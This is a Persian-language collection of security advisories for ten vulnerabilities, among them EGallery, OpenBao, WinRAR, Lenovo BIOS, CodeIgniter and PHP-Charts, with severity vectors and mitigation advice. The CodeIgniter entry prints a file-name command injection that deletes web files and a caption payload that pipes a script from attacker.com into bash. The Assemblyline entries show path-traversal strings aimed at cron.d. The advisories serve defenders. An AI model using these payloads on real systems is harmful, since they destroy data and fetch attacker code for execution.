کشف آسیب‌پذیری در EGallery

تاریخ ایجاد

آسیب‌پذیری CVE-2012-10052 با شدت 9.3 از 10 در افزونه‌ی EGallery نسخه 1.2 شناسایی شده است. این نقص امنیتی به مهاجم اجازه می‌دهد فایل‌های PHP مخرب را از طریق اسکریپت uploadify.php مستقیماً در مسیر قابل‌دسترس وب (پوشه‌ی egallery/) بارگذاری کند.

این آسیب‌پذیری ناشی از نبود اعتبارسنجی نوع فایل‌ها و فقدان مکانیزم‌های حفاظتی در فرآیند آپلود است که منجر به اجرای کامل کد از راه دور در بستر وب‌سرور می‌شود.

این حمله از طریق شبکه انجام می‌شود (AV:N)، پیچیدگی حمله پایین است (AC:L)، نیاز به شرایط خاص ندارد (AT:N)، و نیازی به مجوز یا تعامل کاربر ندارد (PR:N / UI:N). این آسیب‌پذیری تأثیر شدید بر محرمانگی، تمامیت و دسترس‌پذیری دارد (VC:H / VI:H / VA:H) و تأثیرات ثانویه ندارد (SC:N / SI:N / SA:N).

 

محصولات آسیب‌پذیر

  • افزونه‌ی EGallery نسخه‌ی 1.2

 

توصیه‌های امنیتی

  • حذف یا غیرفعال‌سازی افزونه‌ی EGallery نسخه‌ی 1.2 تا زمان ارائه نسخه امن
  • بررسی فایل‌های بارگذاری‌شده اخیر در مسیر egallery/ برای شناسایی فایل‌های مشکوک
  • نصب افزونه‌های امنیتی معتبر برای جلوگیری از بارگذاری‌های غیرمجاز
  • محدودسازی دسترسی به اسکریپت uploadify.php از طریق تنظیمات سرور یا فایروال
  • به‌روزرسانی وردپرس و تمامی افزونه‌ها
  • استفاده از لیست سفید MIME-type برای کنترل نوع فایل‌های قابل بارگذاری
  • بررسی لاگ‌های سرور و وب‌اپلیکیشن

 

منبع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2012-10052

کشف آسیب‌پذیری در OpenBao

تاریخ ایجاد

آسیب‌پذیری CVE-2025-54997 با شدت 9.1 در نرم‌افزار OpenBao نسخه‌های 2.3.1 و پایین‌تر، به مهاجم دارای دسترسی Privileged API Operator امکان می‌دهد با دستکاری پیشوندهای لاگ (Log Prefixes) در زیرسیستم حسابرسی (Audit Subsystem)، محدودیت‌های امنیتی تعریف‌شده برای جلوگیری از اجرای کد سیستم یا انجام ارتباطات شبکه را دور بزند.

این نقص باعث می‌شود مهاجم بتواند کد دلخواه اجرا کرده یا به منابع شبکه‌ای غیرمجاز متصل شود، در حالی که این اقدامات باید برای او مسدود شده باشد. بهره‌برداری از این ضعف می‌تواند به افزایش سطح دسترسی، نقض کامل مدل امنیتی، و دسترسی به داده‌های حساس منجر شود.

این مشکل در نسخه‌ی 2.3.2 برطرف شده و توصیه می‌شود در صورت عدم امکان به‌روزرسانی، دسترسی به مسیرهای sys/audit/* مسدود گردد، هرچند این روش برای کاربر ریشه (Root) محدودیت ایجاد نمی‌کند.

 

محصولات تحت‌تأثیر

  • OpenBao نسخه‌ی 2.3.1 و پایین‌تر
  • استقرار روی سیستم‌عامل Linux
  • استقرار روی سیستم‌عامل Windows
  • محیط‌های کانتینری (Docker, Kubernetes)
  • محیط‌های ابری (Cloud Deployments)
  • استقرارهای On-Premise

 

توصیه‌های امنیتی

  • به‌روزرسانی فوری OpenBao به نسخه‌ی 2.3.2 یا بالاتر
  • مسدود کردن دسترسی به مسیرهای sys/audit/* برای کاربران غیرمجاز
  • پایش و بررسی لاگ‌های زیرسیستم حسابرسی برای شناسایی رفتار غیرعادی
  • اعمال محدودیت‌های شبکه‌ای برای جلوگیری از ارتباطات خروجی غیرمجاز
  • استفاده از اصل کمترین دسترسی (Least Privilege) برای حساب‌های API
  • بررسی صحت و یکپارچگی پیکربندی‌های امنیتی پس از به‌روزرسانی

 

منبع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-54997

کشف آسیب‌پذیری بحرانی در Assemblyline 4 Service Client

تاریخ ایجاد

Assemblyline یک چارچوب متن‌باز تحلیل خودکار بدافزار است که برای پردازش و ارزیابی سریع حجم بالایی از فایل‌ها و نمونه‌های مشکوک استفاده می‌شود. این پلتفرم از معماری سرویس‌محور استفاده می‌کند که در آن سرویس‌ها توسط ماژول Service Client با API مرکزی تبادل داده می‌کنند.

 

جزئیات آسیب‌پذیری

در نسخه‌های آسیب‌پذیر این ابزار، فایل task_handler.py در Service Client مقدار هش SHA-256 بازگشتی از سرور سرویس را مستقیماً به‌عنوان نام فایل محلی استفاده می‌کند، بدون هیچ‌گونه اعتبارسنجی یا پاک‌سازی ورودی. یک سرور مخرب یا مهاجم در موقعیت مرد میانی می‌تواند مقداری مانند "etc/cron.d/evil/../../.." بازگرداند و باعث شود که کلاینت داده‌های دریافتی را در مسیر دلخواه سیستم قربانی ذخیره کند. این مسئله امکان نوشتن یا بازنویسی فایل‌های حیاتی سیستم را فراهم می‌سازد و می‌تواند منجر به اجرای کد مخرب یا تغییر پیکربندی سیستم شود.

این آسیب‌پذیری در سناریوهایی قابل بهره‌برداری است که کلاینت به یک سرویس غیرقابل اعتماد متصل شود یا مسیر ارتباطی بین کلاینت و سرویس در معرض حملات مرد میانی قرار داشته باشد.

بردار حمله:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H

این بردار نشان می‌دهد که آسیب‌پذیری از راه دور و بدون نیاز به تعامل کاربر یا داشتن مجوز قابل بهره‌برداری است. در صورت موفقیت، مهاجم می‌تواند یکپارچگی و دسترس‌پذیری سیستم را تحت تأثیر قرار دهد، اما بر محرمانگی داده‌ها تأثیر مستقیم ندارد.

 

نسخه‌های تحت‌تأثیر

  • تمامی نسخه‌های قبل از ‎4.6.1.dev138 تحت تأثیر این آسیب‌پذیری قرار دارند.

 

توصیه‌های امنیتی

  • به‌روزرسانی: ارتقا به نسخه‌ی ‎4.6.1.dev138 یا بالاتر که در آن اعتبارسنجی مسیر و پاک‌سازی نام فایل پیاده‌سازی شده است.
  • استفاده از TLS/SSL معتبر و امن برای جلوگیری از حملات مرد میانی.
  • محدود کردن دسترسی نوشتن در مسیرهای حساس سیستم.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-55013

[2]https://www.cvedetails.com/cve/CVE-2025-55013

[3]https://euvd.enisa.europa.eu/vulnerability/CVE-2025-55013

[4]https://www.cve.org/CVERecord?id=CVE-2025-55013

[5]https://github.com/CybercentreCanada/assemblyline/security/advisories/GHSA-75jv-vfxf-3865

[6]https://github.com/CybercentreCanada/assemblyline-service-client/commit/351414e7e96cc1f5640ae71ae51…

کشف آسیب‌پذیری در WinRAR

تاریخ ایجاد

یک آسیب‌پذیری با شناسه CVE-2025-8088 و شدت بالا با امتیاز 8.4 شناسایی شده است. این آسیب‌پذیری از نوع Path Traversal (پیمایش مسیر غیرمجاز) بوده و در نسخه ویندوز نرم‌افزار WinRAR وجود دارد. این نقص امنیتی به مهاجمان اجازه می‌دهد با ساخت فایل‌های فشرده مخرب، فایل‌هایی را در مسیرهای دلخواه سیستم قربانی استخراج کنند. این فایل‌ها می‌توانند شامل فایل‌های اجرایی باشند که در پوشه‌های Startup ویندوز قرار می‌گیرند، مانند:

  • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup (Local to user)

  • %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup (Machine-wide)

استخراج این فایل‌ها باعث می‌شود کدهای مخرب به‌صورت خودکار هنگام ورود کاربر به سیستم اجرا شوند. این موضوع امکان اجرای کد دلخواه از راه دور (Remote Code Execution - RCE) را برای مهاجم فراهم می‌کند و در نتیجه، مهاجم کنترل کامل سیستم قربانی را به دست می‌آورد.

 

محصولات آسیب‌پذیر
تمامی نسخه‌های ویندوزی نرم‌افزارهای WinRAR ،RAR ،UnRAR و کتابخانه‌ی UnRAR.dll تحت تأثیر این آسیب‌پذیری قرار دارند. نسخه‌های این نرم‌افزارها برای سیستم‌عامل‌های یونیکس و اندروید آسیب‌پذیر نیستند.

 

توصیه‌های امنیتی
با توجه به جزئیات آسیب‌پذیری مذکور، توصیه‌های امنیتی زیر پیشنهاد می‌شود:

  • انجام به‌روزرسانی فوری نرم‌افزار WinRAR به نسخه‌ی 7.13.
  • افزایش سطح آگاهی کاربران نسبت به حملات فیشینگ و اجتناب از باز کردن فایل‌های فشرده دریافت‌شده از منابع ناشناس یا غیرقابل اعتماد.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-8088

[2]https://www.bleepingcomputer.com/news/security/winrar-zero-day-flaw-exploited-by-romcom-hackers-in-…

کشف آسیب‌پذیری در محصولات Lenovo

تاریخ ایجاد

چهار آسیب‌پذیری با شدت بالا در سیستم‌های شرکت Lenovo شناسایی شده‌اند که هرکدام امتیاز 8.2 از 10 را در سیستم CVSS دریافت کرده‌اند. چهار آسیب‌پذیری CVE-2025-4421 ،CVE-2025-4422 ،CVE-2025-4423 و CVE-2025-4425 دارای بردار حمله یکسانی هستند که نشان‌دهنده سطح بالای خطر و پیچیدگی پایین در بهره‌برداری از آن‌هاست. بردار حمله‌ی این آسیب‌پذیری‌ها به شرح زیر است:

/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

حملات از طریق دسترسی محلی هستند (AV:L)، پیچیدگی پایین دارند (AC:L)، به مجوز سطح بالا (PR:H) و تعامل کاربر (UI:N) نیاز ندارند. دامنه تأثیر فراتر از مؤلفه آسیب‌پذیر است (S:C) و تأثیر بالایی بر محرمانگی، تمامیت و دسترس‌پذیری می‌گذارند (C:H/I:H/A:H).

آسیب‌پذیری‌های CVE-2025-4421 ،CVE-2025-4422 ،CVE-2025-4423 و CVE-2025-4425 همگی نقص‌هایی در مؤلفه‌های سطح پایین Firmware BIOS هستند که مهاجمان را قادر می‌سازند کنترل کامل سیستم را به‌دست بگیرند. این آسیب‌پذیری‌ها در ماژول‌های SMM، DXE و SetupAutomationSmm رخ می‌دهند و بهره‌برداری موفق از آن‌ها می‌تواند منجر به اجرای کد دلخواه، افزایش سطح دسترسی و حتی تخطی از Secure Boot شود.

این ضعف‌ها به‌دلیل نوشتن خارج از محدوده حافظه و سرریز بافر روی پشته به وجود آمده‌اند:

  • آسیب‌پذیری CVE-2025-4421 و CVE-2025-4422 از نوع نوشتن خارج از محدوده حافظه هستند (CWE-787).
  • آسیب‌پذیری CVE-2025-4423 از نوع محدودیت نادرست در عملیات حافظه است (CWE-119).
  • آسیب‌پذیری CVE-2025-4425 از نوع سرریز بافر مبتنی بر پشته است (CWE-121).

از آن‌جا که حملات در سطح پایین سیستم انجام می‌شوند، حتی پس از نصب مجدد سیستم‌عامل نیز باقی می‌مانند و ممکن است تأثیر آن‌ها به سایر بخش‌های امنیتی سیستم نیز گسترش یابد.

 

محصولات آسیب‌پذیر

  • لپ‌تاپ‌ها و دسکتاپ‌های شرکت Lenovo که از نسخه‌های خاصی از Firmware مبتنی بر Insyde BIOS استفاده می‌کنند.
  • سیستم‌هایی که از ماژول‌های EfiSmiServices، EfiPcdProtocol و SetupAutomationSmm بهره می‌برند.
  • نسخه‌هایی که فاقد بررسی‌های امنیتی در حافظه SMM یا پشته هستند.
  • سیستم‌هایی که به‌روزرسانی‌های امنیتی منتشرشده تا 30 جولای 2025 را دریافت نکرده‌اند.

 

توصیه‌های امنیتی

  • بررسی نسخه‌ی BIOS و به‌روزرسانی به نسخه‌های امن منتشرشده توسط Lenovo.
  • فعال‌سازی مکانیزم‌های حفاظتی مانند Secure Boot و Firmware Integrity Verification.
  • استفاده از ابزارهای تحلیل Firmware مانند Binarly efiXplorer برای بررسی آسیب‌پذیری‌های مشابه.
  • محدودسازی دسترسی فیزیکی و محلی به دستگاه‌ها.
  • نظارت بر تغییرات غیرمجاز در Firmware با استفاده از راهکارهایی مانند HP Sure Start یا Lenovo Eclypsium.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-4425

[2]https://nvd.nist.gov/vuln/detail/CVE-2025-4421

[3]https://nvd.nist.gov/vuln/detail/CVE-2025-4423

[4]https://nvd.nist.gov/vuln/detail/CVE-2025-4422

کشف آسیب‌پذیری اجرای فرمان در PHP CodeIgniter

تاریخ ایجاد

CodeIgniter یک چارچوب توسعه برنامه‌های تحت وب PHP Full-stack است که به دلیل سادگی و کارایی بالا بسیار پرکاربرد است. اخیراً یک آسیب‌پذیری بحرانی با شناسه‌ی CVE-2025-54418 و شدت 9.8 در کتابخانه ImageMagick که امکان پردازش تصاویر را در CodeIgniter فراهم می‌سازد، شناسایی شده است. استفاده نادرست از این کتابخانه در کنار ورودی‌های غیرایمن کاربر می‌تواند منجر به آسیب‌های جدی امنیتی شود.

 

جزئیات آسیب‌پذیری

این آسیب‌پذیری یک نقص امنیتی از نوع تزریق دستورات سیستم‌عامل است که هنگام استفاده از ابزار ImageMagick به‌عنوان ابزار پردازش تصویر رخ می‌دهد. از آن‌جا که اجرای ImageMagick در سطح سیستم‌عامل انجام می‌شود، این آسیب‌پذیری به مهاجم اجازه می‌دهد از طریق روش‌های زیر حمله را انجام دهد و فرمان‌های دلخواه سیستم‌عامل را اجرا کند:

1. آپلود فایلی با نام مخرب

آپلود فایلی که نام آن شامل کاراکترهای خاص مورد استفاده در پوسته سیستم‌عامل باشد و با همین نام ذخیره و با استفاده از متد ()resize پردازش ‌شود. به‌عنوان مثال، فایل با نام زیر اگر توسط ابزار ImageMagick تحلیل شود، منجر به حذف کل فایل‌های وب‌سرور می‌گردد:

$(rm -rf /var/www/html/*).jpg

2. استفاده از ورودی متنی مخرب در متد ()text

وارد کردن متنی مخرب هنگام استفاده از ()متد text با استفاده از ورودی‌های اعتبارسنجی‌نشده، به مهاجم امکان می‌دهد دستورات دلخواه را اجرا کرده و کنترل کامل سیستم قربانی را به دست آورد. به‌عنوان مثال، اگر کاربر متن زیر را از طریق متد ()text برای درج روی یک تصویر وارد نماید، به دلیل عدم پاک‌سازی ورودی، کد مخربی از سرور مهاجم دانلود شده و منجر به نصب درب پشتی، سرقت اطلاعات یا کنترل کامل سیستم می‌شود:

caption:@|bash -c "curl http://attacker.com/shell.sh | bash"

 

بردار CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H نشان می‌دهد بهره‌برداری از آن نیازی به دسترسی قبلی و تعامل کاربر ندارد و مهاجم می‌تواند از طریق ارسال درخواست از راه دور، بدون احراز هویت و با کمترین پیچیدگی، فرمان‌هایی را اجرا کند که منجر به افشای اطلاعات حساس، تغییر یا تخریب داده‌ها، و توقف کامل سرویس شود. این نقص امنیتی محرمانگی، یکپارچگی و دسترس‌پذیری سامانه را تحت تأثیر قرار می‌دهد.

 

نسخه‌های تحت‌تأثیر

  • تمام نسخه‌های CodeIgniter قبل از 4.6.2 که از ImageMagick به‌عنوان پردازشگر تصویر استفاده می‌کنند، در معرض این حمله قرار دارند.

 

توصیه‌های امنیتی

  • ارتقا CodeIgniter به نسخه‌ی 4.6.2 یا بالاتر.
  • استفاده از ابزار پردازشگر پیش‌فرض GD به‌جای ImageMagick که نسبت به این آسیب‌پذیری ایمن است.
  • هنگام ذخیره فایل‌های آپلودشده، از نام‌های تصادفی مانند خروجی تابع ()getRandomName یا ()store استفاده شود تا از تزریق کاراکترهای مخرب در نام فایل جلوگیری گردد.
  • در کاربرد تابع ()text، لازم است ورودی‌ها پاک‌سازی شده و کاراکترهای غیرمجاز حذف شوند.

 

منابع خبر:

[1]https://www.cvedetails.com/cve/CVE-2025-54418

[2]https://nvd.nist.gov/vuln/detail/CVE-2025-54418

[3]https://www.cve.org/CVERecord?id=CVE-2025-54418

[4]https://euvd.enisa.europa.eu/vulnerability/CVE-2025-54418

[5]https://github.com/codeigniter4/CodeIgniter4/security/advisories

کشف آسیب‌پذیری در کلاینت سرویس Assemblyline

تاریخ ایجاد

کلاینت سرویس Assemblyline 4 بخشی از پلتفرم Assemblyline است که به‌عنوان واسط بین سرویس‌های پردازش و هسته مرکزی این سیستم عمل می‌کند. وظیفه آن دریافت وظایف از هسته Assemblyline از طریق API، دانلود فایل‌ها یا داده‌های مورد نیاز، تحویل آن‌ها به سرویس پردازشی برای تحلیل، و در نهایت ارسال نتایج پردازش به هسته است. این کلاینت یک چارچوب آماده و استاندارد فراهم می‌کند تا توسعه‌دهندگان بتوانند سرویس‌های خود را بدون نیاز به پیاده‌سازی کامل منطق ارتباطی با سیستم اصلی، به‌راحتی به Assemblyline متصل کنند.

در نسخه‌های قبل از 4.6.1.dev138، در فایل task_handler.py، مقدار SHA-256 دریافتی از سرور سرویس بدون هیچ‌گونه اعتبارسنجی یا پاک‌سازی، مستقیماً به‌عنوان نام یک فایل محلی استفاده می‌شود. در چنین شرایطی، اگر سرور سرویس مخرب یا آلوده باشد یا حتی یک مهاجم در میانه مسیر بتواند پاسخ سرور را دستکاری کند، امکان ارسال یک مقدار ساختگی به‌جای SHA-256 واقعی وجود دارد. برای مثال، مهاجم می‌تواند رشته‌ای شامل مسیر نسبی مخرب مانند مسیر زیر را برگرداند:

../../../etc/cron.d/evil

کلاینت بدون بررسی، این مقدار را به‌عنوان مسیر ذخیره‌سازی فایل در نظر می‌گیرد و داده دریافتی را در مسیر دلخواه مهاجم روی دیسک می‌نویسد. این موضوع منجر به آسیب‌پذیری Path Traversal و در نتیجه امکان نوشتن فایل در مکان‌های حساس سیستم می‌شود که می‌تواند اجرای کد مخرب یا تغییر پیکربندی‌های حیاتی را به دنبال داشته باشد.

pic

 

محصولات آسیب‌پذیر

  • نسخه‌های قبل از 4.6.1.dev138

 

توصیه‌های امنیتی

  • این مشکل در نسخه‌ی 4.6.1.dev138 برطرف شده است. به کاربران توصیه می‌شود که از نسخه‌ی 4.6.1.dev138 استفاده نمایند.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-55013

[2]https://github.com/CybercentreCanada/assemblyline-service-client/commit/351414e7e96cc1f5640ae71ae51…

کشف آسیب‌پذیری در سرور NVIDIA Triton

تاریخ ایجاد

آسیب‌پذیری CVE-2025-23310 با شدت 9.8 ناشی از سرریز بافر پشته در اجزای پردازش ورودی‌ها در سرور NVIDIA Triton است. مهاجم می‌تواند با ارسال ورودی‌های ساختگی و بزرگ‌تر از اندازه بافر پیش‌بینی‌شده، باعث بروز سرریز در حافظه شود. این موضوع می‌تواند به اجرای کد دلخواه روی سرور منجر شود یا در نتیجه آن، سرور از کار بیفتد (Denial of Service). همچنین احتمال افشای داده‌ها یا تغییر غیرمجاز آن‌ها نیز وجود دارد.

آسیب‌پذیری CVE-2025-23311 با شدت 9.8 مشابه مورد قبلی است، ولی در پردازشگر درخواست‌های HTTP سرور رخ می‌دهد. ارسال درخواست‌های HTTP با قالب خاص باعث سرریز بافر پشته می‌شود. بهره‌برداری موفق از این نقص می‌تواند منجر به اجرای کد از راه دور، ایجاد اختلال در سرویس، افشای داده‌ها و تغییر آنها گردد.

 

محصولات تحت‌تأثیر

  • نسخه‌های آسیب‌پذیر: تمام نسخه‌های قبل از 25.07
  • سیستم‌عامل‌ها: Linux / Windows (تمام توزیع‌های پشتیبانی‌شده)

 

توصیه‌های امنیتی

  • بروزرسانی فوری: نسخه‌های آسیب‌پذیر به نسخه‌ی 25.07 یا جدیدتر به‌روزرسانی شوند.
  • محدود کردن دسترسی: دسترسی به سرور Triton را به شبکه‌های امن و منابع معتبر محدود کنید.
  • مانیتورینگ: لاگ‌ها و ترافیک شبکه را برای شناسایی درخواست‌های غیرعادی یا مشکوک پایش کنید.
  • تست امنیتی: تست نفوذ و ارزیابی امنیتی منظم روی سرور انجام دهید.
  • آموزش: تیم‌های توسعه و عملیات را درباره آسیب‌پذیری‌های buffer overflow و روش‌های مقابله آموزش دهید.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-23310

[2]https://nvd.nist.gov/vuln/detail/CVE-2025-23311

کشف آسیب‌پذیری در دربخش افزونه‌های Google Chrome

تاریخ ایجاد

افزونه‌های مرورگر Chrome با گسترش قابلیت‌های مرورگر به کاربران امکان می‌دهند تعامل با وب‌سایت‌ها را سفارشی‌سازی کرده و فرآیندهای تکراری را خودکار کنند. این سطح از انعطاف‌پذیری باعث می‌شود افزونه‌ها به یکی از نقاط بالقوه برای حملات تبدیل شوند.

 

جزئیات آسیب‌پذیری

در نسخه‌های قبل از 139.0.7258.66 از مرورگر Google Chrome، یک آسیب‌پذیری از نوع Use-After-Free با شناسه‌ی CVE-2025-8576 و شدت 8.8 در بخش افزونه‌ها شناسایی شده است. این نقص به یک مهاجم از راه دور امکان می‌دهد با استفاده از یک افزونه Chrome مخرب، شرایطی ایجاد کند که در آن حافظه‌ای که قبلاً آزاد شده دوباره مورد استفاده قرار گیرد. این دسترسی غیرمجاز به حافظه‌ی آزاد شده می‌تواند منجر به تخریب حافظه شود که زمینه‌ساز قفل کردن و اجرای کد دلخواه خواهد بود.

از آنجا که افزونه‌ها می‌توانند به بخش‌های عمیق‌تری از ساختار مرورگر دسترسی داشته باشند، چنین آسیب‌پذیری‌هایی در صورت ترکیب با سایر نقص‌ها می‌توانند به حملات پیچیده‌تر منجر شوند. تاثیر این آسیب‌پذیری می‌تواند شامل تخریب حافظه، کاهش پایداری سیستم و نفوذ به حریم خصوصی کاربران از طریق نصب یا اجرای غیرمجاز کد در محیط مرورگر باشد.

بردار CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H نشان می‌دهد مهاجم برای بهره‌برداری از این آسیب‌پذیری نیازی به احراز هویت ندارد؛ به همین دلیل مهاجم می‌تواند بدون داشتن دسترسی قبلی به سیستم هدف و تنها با ترغیب کاربر به نصب یا اجرای یک افزونه مخرب، حمله را آغاز کند. پیچیدگی حمله پایین است. موفقیت در اجرای این حمله می‌تواند منجر به افشای اطلاعات حساس، دست‌کاری در داده‌ها و در نهایت اختلال کامل در عملکرد سیستم شود، بنابراین محرمانگی، یکپارچگی و دسترس‌پذیری به‌طور همزمان تحت تأثیر قرار می‌گیرند.

از آنجایی که این آسیب‌پذیری به‌صورت مستقیم سیستم‌عامل یا شبکه را درگیر نمی‌کند و در بستر مرورگر اتفاق می‌افتد، تأثیر آن محدود به مرورگر کاربر است.

 

نسخه‌های تحت‌تأثیر

  • کلیه‌ی نسخه‌های پیش از 139.0.7258.66 تحت تأثیر این آسیب‌پذیری قرار دارند.

 

توصیه‌های امنیتی

  • به‌روزرسانی مرورگر به نسخه‌ی 139.0.7258.66 یا بالاتر
  • عدم نصب افزونه‌های ناشناس یا غیرقابل‌اعتماد: فقط از افزونه‌هایی استفاده کنید که در Chrome Web Store منتشر شده‌اند و دارای امتیاز و بازخورد مناسب هستند.
  • مرور و مدیریت دوره‌ای افزونه‌ها: افزونه‌های نصب‌شده را بررسی نموده و هر افزونه‌ای که استفاده نمی‌شود یا منبع آن مشکوک است را غیرفعال یا حذف نمایید.
  • محدود کردن سطح دسترسی افزونه‌ها در تنظیمات Chrome

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-8576

[2]https://www.cve.org/CVERecord?id=CVE-2025-8576

[3]https://euvd.enisa.europa.eu/vulnerability/CVE-2025-8576

[4]https://chromereleases.googleblog.com/2025/08/stable-channel-update-for-desktop.html

کشف آسیب‌پذیری در PHP-Charts v1.0

تاریخ ایجاد

PHP-Charts یک کتابخانه متن‌باز مبتنی بر PHP است که به توسعه‌دهندگان امکان تولید انواع نمودارهای آماری و گرافیکی را به‌سادگی و بدون نیاز به دانش پیشرفته در زمینه گرافیک می‌دهد. PHP-Charts به دلیل سادگی پیاده‌سازی و خروجی‌های قابل سفارشی‌سازی، در بسیاری از وب‌سایت‌های شخصی، پنل‌های مدیریتی و ابزارهای داشبورد داده مورد استفاده قرار می‌گیرد. اخیراً در نسخه‌ی 1.0 این کتابخانه، آسیب‌پذیری با شناسه‌ی CVE-2013-10070 و شدت 10 شناسایی شده است که می‌تواند امنیت کل سرور را تحت تاثیر قرار دهد.

 

جزئیات آسیب‌پذیری

در نسخه‌ی 1.0 از PHP-Charts، فایل wizard/url.php به گونه‌ای طراحی شده که نام پارامترهای ارسال‌شده از طریق متد GET مستقیماً بدون اینکه هیچ‌گونه اعتبارسنجی، فیلتر یا مکانیزم امن‌سازی روی آن‌ها اعمال شود، به تابع ()eval در PHP منتقل می‌شوند. مهاجم می‌تواند از این نقص بهره‌برداری کرده و با ارسال یک درخواست HTTP مخرب، نام پارامتر را به‌گونه‌ای تعریف کند که شامل یک بار مخرب باشد. معمولاً این بار به صورت base64 رمزگذاری شده و سپس توسط ()eval رمزگشایی و اجرا می‌شود. این فرآیند به مهاجم اجازه می‌دهد تا کد PHP دلخواه خود را روی سرور اجرا کند. از آنجا که این کد تحت سطح دسترسی وب‌سرور اجرا می‌شود، مهاجم می‌تواند به فایل‌های سرور دسترسی یافته، دستورات سیستمی اجرا کرده، بدافزار بارگذاری کند یا به اطلاعات حساس دست یابد.

بردار CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H نشان‌دهنده‌ی یک آسیب‌پذیری بحرانی است که بهره‌برداری از آن از راه دور و بدون نیاز به تعامل کاربر امکان‌پذیر است. مهاجم می‌تواند با پیچیدگی پایین و بدون احراز هویت، از این نقص امنیتی سوءاستفاده کرده و محرمانگی، یکپارچگی، در دسترس بودن و حتی امنیت سیستم را به‌طور کامل به خطر اندازد. تأثیر این آسیب‌پذیری در همه ابعاد سیستمی حداکثر ممکن ارزیابی شده است، به طوری که بهره‌برداری موفق می‌تواند منجر به اجرای کد دلخواه، تخریب داده‌ها، افشای اطلاعات حساس و در نهایت تسلط کامل بر سرور هدف گردد.

 

نسخه‌های تحت‌تأثیر

  • PHP-Charts نسخه‌ی 1.0 و سایر نسخه‌هایی که شامل فایل wizard/url.php با طراحی مشابه هستند تحت تاثیر این آسیب‌پذیری قرار دارند.

 

توصیه‌های امنیتی

  • به‌روزرسانی PHP-Charts به آخرین نسخه امن
  • غیرفعال نمودن یا محدود کردن اجرای مستقیم اسکریپت‌های غیرضروری مانند wizard/url.php در تنظیمات وب‌سرور (nginx.conf ،httpd.conf، htaccess)
  • غیرفعال‌سازی توابع خطرناک PHP مانند proc_open ،popen ،shell_exec ،passthru ،passthru ،exec ،eval در فایل تنظیمات PHP (php.ini)

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2013-10070

[2]https://www.cve.org/CVERecord?id=CVE-2013-10070

[3]https://euvd.enisa.europa.eu/vulnerability/CVE-2013-10070

[4]https://www.exploit-db.com/exploits/24201